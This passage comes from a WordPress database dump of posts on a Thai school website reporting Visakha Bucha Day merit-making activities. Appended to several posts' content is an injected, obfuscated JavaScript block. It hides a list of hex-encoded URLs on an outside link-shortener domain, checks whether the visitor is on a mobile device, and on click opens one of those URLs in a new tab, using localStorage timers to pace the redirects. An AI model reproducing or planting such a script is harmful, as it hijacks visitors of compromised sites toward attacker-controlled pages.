wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \"วันวิสาขบูชา\"','','inherit','closed','closed','','426-revision-v1','','','2024-08-01 20:48:19','2024-08-01 13:48:19','',426,'http://pakhaeng.ssk.in.th/?p=428',0,'revision','',0),
(429,1,'2024-08-01 20:50:10','2024-08-01 13:50:10','<!-- wp:paragraph -->\n<p><strong>วันที่ 22 พฤษภาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครู และบุคลากรทางการศึกษา ร่วมทำบุญถวายภัตาหารเช้า ทำบุญตักบาตร และเวียนเทียน ในกิจกรรมสัปดาห์วันวิสาขบูชา โดยมี นายภัทรนันท์ บุญมานัด นายอำเภอโนนคูณ เป็นประธานในพิธี ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":430,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/20-2567-724x1024.png\" alt=\"\" class=\"wp-image-430\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ กิจกรรม “สัปดาห์ส่งเสริมการเผยแผ่พระพุทธศาสนา เนื่องในเทศกาลวันวิสาขบูชา ปี 2567”','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%81%e0%b8%b4%e0%b8%88','','','2024-08-01 20:50:11','2024-08-01 13:50:11','',0,'http://pakhaeng.ssk.in.th/?p=429',0,'post','',0),
(430,1,'2024-08-01 20:49:59','2024-08-01 13:49:59','','20-2567','','inherit','','closed','','20-2567','','','2024-08-01 20:49:59','2024-08-01 13:49:59','',429,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/20-2567.png',0,'attachment','image/png',0),
(431,1,'2024-08-01 20:50:10','2024-08-01 13:50:10','<!-- wp:paragraph -->\n<p><strong>วันที่ 22 พฤษภาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครู และบุคลากรทางการศึกษา ร่วมทำบุญถวายภัตาหารเช้า ทำบุญตักบาตร และเวียนเทียน ในกิจกรรมสัปดาห์วันวิสาขบูชา โดยมี นายภัทรนันท์ บุญมานัด นายอำเภอโนนคูณ เป็นประธานในพิธี ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":430,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/20-2567-724x1024.png\" alt=\"\" class=\"wp-image-430\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 